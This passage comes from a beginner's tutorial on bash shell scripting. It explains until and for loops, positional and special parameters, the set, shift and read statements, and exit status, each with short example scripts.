The until loop complements the while construct in the sense that the loop body here is executed repeatedly as long as the condition remains false.

Syntax:

until condition_is_true

do

execute commands

done

Example:

...

until [ -r myfile ]

do

sleep 5

done

The above code is executed repeatedly until the file myfile can be read.

for loop

Syntax :

for variable in list

do

execute commands

done

Example:

...

for x in 1 2 3 4 5

do

echo "The value of x is $x";

done

Here the list contains 5 numbers 1 to 5. Here is another example:

for var in $PATH $MAIL $HOME

do

echo $var

done

Suppose you have a directory full of java files and you want to compile those. You can write a script like this:

...

for file in *.java

do

javac $file

done

Note: You can use wildcard expressions in your scripts.

A few special symbols and their meanings w.r.t shell scripts

$* - This denotes all the parameters passed to the script at the time of its execution, which includes $1, $2 and so on.

$0 - Name of the shell script being executed.

$# - Number of arguments specified in the command line.

$? - Exit status of the last command.

The above symbols, along with $1, $2 and so on, are known as the positional and special parameters. Let me explain them with the aid of an example. Suppose I have a shell script called my_script.sh. Now I execute this script on the command line as follows:

$ ./my_script.sh linux is a robust OS

... as you can see above, I have passed 5 parameters to the script. In this scenario, the values of the positional parameters are as follows:

$* - will contain the values 'linux', 'is', 'a', 'robust', 'OS'.

$0 - will contain the value my_script.sh - the name of the script being executed.

$# - contains the value 5 - the total number of parameters.

$$ - contains the process ID of the current shell. You can use this parameter while giving unique names to any temporary files that you create at the time of execution of the shell.

$1 - contains the value 'linux'

$2 - contains the value 'is'

... and so on.
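A tiny script that simply prints these parameters makes the behaviour easy to see (show_args.sh is a hypothetical name):

#!/bin/bash
# show_args.sh - display the special and positional parameters
echo "Script name    : $0"
echo "All arguments  : $*"
echo "Argument count : $#"
echo "First argument : $1"
echo "Process ID     : $$"

Run it as:

$ ./show_args.sh linux is a robust OS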

The set and shift statements

set - Lets you associate values with these positional parameters.

For example, try this:

$ set `date`

$ echo $1

$ echo $*

$ echo $#

$ echo $2

shift - transfers the contents of each positional parameter to its immediately lower-numbered one ($2 becomes $1, $3 becomes $2, and so on). This happens once for every time it is called.

Example :

$ set `date`

$ echo $1 $2 $3

$ shift

$ echo $1 $2 $3

$ shift

$ echo $1 $2 $3

To see the process Id of the current shell, try this:

$ echo $$

2667

Validate that it is the same value by executing the following command:

$ ps -f |grep bash

read statement

Make your shell script interactive: the read statement lets the user enter values while the script is being executed. When a program encounters a read statement, it pauses at that point. Input entered through the keyboard is read into the variables following read, and program execution continues.

Eg:

#!/bin/sh

echo "Enter your name : "

read name

echo "Hello $name , Have a nice day."

Exit status of the last command

Every command returns a value after execution. This value is called the exit status or return value of the command. A command is said to be true if it executes successfully, and false if it fails. This can be checked in the script using the $? positional parameter.
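For example, the sketch below checks $? right after grep to decide whether the word was found (it reuses the thisfile.html example from earlier):

#!/bin/bash
grep -q "linuxhelp" thisfile.html
if [ $? -eq 0 ]
then
    echo "grep succeeded - the word is in the file"
else
    echo "grep returned a non-zero status - the word was not found"
fi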

Here I have given a concise introduction to the art of bash shell scripting in Linux. But there is more to shell scripting than what I have covered. For one, there are different kinds of shells, bash being only one of them, and each shell has some variation in its syntax; the C shell, for example, uses a syntax close to the C language. What I have covered above applies to bash and other Bourne-compatible shells such as sh and ksh.

-- End of The 10 secs Guide to Bash Scripting --

Now check how much time you have taken to cover this much.

 

Hope this tutorial was informative for you all :)

 
Things You Should Know About Linux !!!